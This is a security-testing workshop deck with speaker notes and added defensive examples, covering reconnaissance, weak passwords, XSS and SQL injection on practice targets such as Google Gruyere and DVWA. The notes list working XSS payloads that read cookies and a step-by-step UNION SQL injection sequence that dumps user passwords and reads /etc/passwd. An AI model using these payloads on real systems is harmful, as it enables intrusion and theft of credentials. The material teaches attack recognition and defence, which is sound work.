Security testing operation vijay

Understand the basics of testing security aspects such as passwords and robots.txt. Understand SQL injection and XSS attacks, and how to automate testing for them with the ZAP proxy tool.

  1. Security Testing: Operation Vijay
  2. What is hacking?
  3. Hackers
  4. Types of Hackers
     ● Ethical Hackers
     ● Crackers
  5. Define: Security Testing is a type of testing that intends to uncover vulnerabilities of the system and determine that its data and resources are protected from possible intruders.
  6. Types of Security Testing
     ● Infrastructure Security Testing
     ● Application Security Testing
  7. When?
  8. Security Testing Vocabulary
     ● Reconnaissance / Information gathering
     ● Vulnerability
     ● Exploit
  9. Reconnaissance Demo
  10. Reconnaissance Mission
  11. P@ssw04d
  12. Default / Weak Passwords
  13. Password Vaults Demo
  14. Cross Site Scripting: a client-side injection attack. Types:
     ● Reflected XSS
     ● Stored XSS
     ● DOM-based XSS
  15. Reflected XSS Demo
  16. Reflected XSS Mission
  17. Stored XSS Demo
  18. Stored XSS Mission
  19. XSS Prevention
     ● Don’t use user input as-is
     ● Encoding
     ● X-XSS-Protection response header
     ● HttpOnly flag (Set-Cookie response header)
  20. Popular XSS Attacks
  21. SQL Injection: an attack where SQL commands are injected in order to affect the execution of predefined SQL commands
  22. SQL Injection Demo
  23. SQL Injection Prevention
     ● Don’t use user input directly
     ● Use prepared statements
     ● Use stored procedures
     ● Use frameworks
  24. ZAP
  25. References
     https://www.owasp.org
     https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
     https://www.google.co.in/about/appsecurity/tools/
     https://xkcd.com/327/
     http://www.dvwa.co.uk/
     https://www.amazon.in/Web-Application-Hackers-Handbook-Exploiting-ebook/dp/B005LVQA9S
     https://google-gruyere.appspot.com
  26. Thank you
     Dhaval Doshi (@dhavaldoshi)
     Lavanya Mohan (@LavanyaMohan210)
     Shirish Padalkar (@_Garbage_)

Editor's Notes

  • Hacking is the practice of modifying the features of a system, in order to accomplish a goal outside of the creator's original purpose
  • Why do real hackers hack? What is their motivation?
    Money?
    Damage to opponent
    Fame
    Government does hacking to get information

  • Also known as ethical hackers, White Hat hackers are the good guys of the hacker world. They’ll help you remove a virus or PenTest a company.
    Black Hat – Also known as crackers, these are the men and women you hear about in the news. They find banks or other companies with weak security and steal money or credit card information. The surprising truth about their methods of attack is that they often use common hacking practices they learned early on.
    Gray Hat – Nothing is ever just black or white; the same is true in the world of hacking. Gray Hat hackers don’t steal money or information (although, sometimes they deface a website or two), yet they don’t help people for good (but, they could if they wanted to). These hackers comprise most of the hacking world, even though Black Hat hackers garner most (if not all) of the media’s attention.
  • Infrastructure Security Testing
    Hack a Windows machine to get full control
    Cause the network to go down

    Application Security Testing
    JIRA installed on a local server
  • When do you do security testing? When should we do it?
  • Reconnaissance - a mission to obtain information by visual observation or other detection methods
    Vulnerability - a weakness which allows an attacker to reduce a system's information assurance
    Exploit - causing unintended or unanticipated behaviour to occur on computer software, hardware, or something electronic (usually computerised) by taking advantage of vulnerabilities
  • http://www.hackingtheuniverse.com/

    I don’t like these guys.
    I want to do some damage.
    How do I start hacking?
    Let’s think.
    Any ideas?

    Show them Wappalyzer.
    It shows versions as well. If the version of some software they are using has known vulnerabilities, that can be exploited.

    Example: http://www.cvedetails.com/vulnerability-list/vendor_id-2337/product_id-4096/

    Show:
    Wappalyzer
    robots.txt
    Admin login screen

    Task ->
  • Ask for details of their passwords.
    It is recommended to use more than 8 characters in a password. How many have an email password shorter than 8 characters?
    How many have only lowercase?
    Blah….
    What would be your guess for their password?

    What we were doing here is applying social engineering techniques to get to know your passwords or other important information. Can we really get details by just talking and not using a computer?
    Let’s see a video.
  • https://www.youtube.com/watch?v=lc7scxvKQOo

  • Default usernames and passwords, such as admin/password on admin consoles.
    People use very common passwords (like "password" or just numbers, their names or dictionary words).
    41% of people use only lowercase passwords. Only about 4% use special characters in passwords.
    50% of people have passwords shorter than 8 characters (at least 8 is recommended).
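A password policy check that turns the weaknesses listed above (default credentials, dictionary words, short, lowercase-only, no special characters) into code. This is an added example, not part of the talk; the common-password and default-credential lists are constructed stand-ins for real breach lists, and the leet-substitution table is an assumption so that slide 11's "P@ssw04d"-style spellings are still caught.

```python
import string

# Constructed stand-ins for a breached-password list and a default-credential list;
# a real deployment would load these from a file (example code, not the talk's).
COMMON_PASSWORDS = {"password", "123456", "qwerty", "letmein", "welcome", "admin"}
DEFAULT_CREDENTIALS = {("admin", "admin"), ("admin", "password"), ("root", "root")}
# Assumed leet substitutions, so that P@ssw0rd is recognised as "password".
LEET = str.maketrans("@043$1!", "aoaesii")


def normalise(password):
    """Lower-case and undo leet substitutions before the dictionary lookup."""
    return password.lower().translate(LEET)


def password_findings(username, password):
    """Return the weaknesses the talk warns about; an empty list means none were found."""
    findings = []
    if (username.lower(), password.lower()) in DEFAULT_CREDENTIALS:
        findings.append("default credential")
    if normalise(password) in COMMON_PASSWORDS or username.lower() in normalise(password):
        findings.append("common or dictionary word")
    if len(password) < 8:
        findings.append("shorter than 8 characters")
    if password and all(c in string.ascii_lowercase for c in password):
        findings.append("only lowercase letters")
    if not any(c in string.punctuation for c in password):
        findings.append("no special characters")
    return findings
```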
  • XSS attacks are type of injection attacks in which the attacker injects malicious code in web pages that are viewed by other users of the application.
  • Basic demo using the script tag.
    Ask if you can just sanitize the script tag. Show how to bypass that -> <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>
  • https://google-gruyere.appspot.com/536172483468/%3Cscript%3Ealert(document.cookie)%3C/script%3E

    https://google-gruyere.appspot.com/536172483468/feed.gtl?uid=%3Cscript%3Ealert(1)%3C/script%3E
  • Ask if small text fields will prevent this attack
    Tell them about intercepting requests
  • Google Gruyere stored XSS (new snippet):
    <a onmouseover="alert(1)" href="#">read this!</a>
    <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>

  • HTML encoding (< → &lt;)
    URL encoding before inserting it into HTML
    HTML attribute encoding
    CSS encoding
    The X-XSS-Protection response header enables the cross-site scripting (XSS) filter built into some modern web browsers. This filter is usually enabled by default anyway, so the role of this header is to re-enable it for this particular website if the user disabled it.
    When the HttpOnly flag is included in the Set-Cookie response header, the cookie cannot be accessed through client-side script.
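Why "sanitize the script tag" fails and output encoding does not, as an added example (not code from the talk or from Gruyere): the two payloads from the notes are rendered once through a script-tag blacklist and once through HTML encoding, and an HTML parser reports which tags and on* handlers a browser would still act on. The cookie and header helpers show the HttpOnly and X-XSS-Protection settings from slide 19; the `<p>` wrapper and the `session` cookie name are assumptions.

```python
import html
import re
from html.parser import HTMLParser
from http.cookies import SimpleCookie

# Constructed inputs: the two payloads used in the demo notes above.
SCRIPT_PAYLOAD = "<script>alert(document.cookie)</script>"
IMG_PAYLOAD = '<img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>'


def render_naive(user_input):
    """The blacklist approach challenged in the notes: strip <script> tags only."""
    cleaned = re.sub(r"</?script[^>]*>", "", user_input, flags=re.IGNORECASE)
    return "<p>" + cleaned + "</p>"


def render_encoded(user_input):
    """Slide 19 advice: HTML-encode untrusted data for the text context it lands in."""
    return "<p>" + html.escape(user_input, quote=True) + "</p>"


class _ActiveContent(HTMLParser):
    """Collect what a browser would treat as markup: tags and on* event handlers."""
    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        if tag != "p":  # ignore the wrapper the templates add
            self.found.append(tag)
        self.found += [name for name, _ in attrs if name.startswith("on")]


def active_content(rendered):
    """Tags and event handlers that survive rendering; empty means the input is inert."""
    parser = _ActiveContent()
    parser.feed(rendered)
    return parser.found


def session_cookie_header(session_id):
    """HttpOnly keeps the cookie out of document.cookie even if a script does run."""
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True
    cookie["session"]["secure"] = True
    return cookie.output()


def hardening_headers():
    """Slide 19 header; X-XSS-Protection is a legacy browser filter, not a defence on its own."""
    return {"X-XSS-Protection": "1; mode=block", "Content-Type": "text/html; charset=utf-8"}
```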
  • It happens when the computer cannot tell the difference between code and data.
  • 2
    '
    2' #
    2' OR 1=1
    2' Union select null #
    2' union Select null, null #
    2' Union Select null, @@version #
    2' Union Select null, database() #
    2' union select null, table_name from information_schema.tables #
    2' union select null, table_name from information_schema.tables where table_name like '%user%' #
    2' Union select null, column_name from information_schema.columns where table_name='users' #
    1' Union select null, concat(user, 0x0a,password) from users #
    2' Union select null, LOAD_FILE('/etc/passwd') #
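The code-versus-data point from the note above and the prepared-statement fix from slide 23, as an added example that is not part of the talk or of DVWA: the same lookup is written once with string concatenation and once with a bound parameter, and run against the demo's OR and UNION inputs. The in-memory SQLite table is a constructed stand-in for the DVWA users table, so the comment syntax is SQLite's `--` rather than MySQL's `#`.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the DVWA users table used in the demo."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, first_name TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "admin", "hash-1"), (2, "gordon", "hash-2"), (3, "pablo", "hash-3")])
    return con


def lookup_vulnerable(con, user_id):
    """What the demo exploits: the input is pasted into the SQL text, so quotes and
    keywords inside it become part of the statement (code and data are not separated)."""
    sql = "SELECT first_name FROM users WHERE id = '%s'" % user_id
    return [row[0] for row in con.execute(sql)]


def lookup_prepared(con, user_id):
    """Slide 23 fix: a prepared statement sends the value as a bound parameter, so the
    same input can only ever be compared against id and never changes the query."""
    sql = "SELECT first_name FROM users WHERE id = ?"
    return [row[0] for row in con.execute(sql, (user_id,))]


# Demo inputs from the talk, rewritten in SQLite syntax (-- instead of # for comments).
NORMAL_INPUT = "2"
OR_INPUT = "2' OR '1'='1"
UNION_INPUT = "2' UNION SELECT password FROM users -- "
```

Against `lookup_vulnerable`, `OR_INPUT` returns every user and `UNION_INPUT` returns the password column; against `lookup_prepared` both return no rows, because no id equals that literal string.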
  • https://www.google.co.in/about/appsecurity/tools/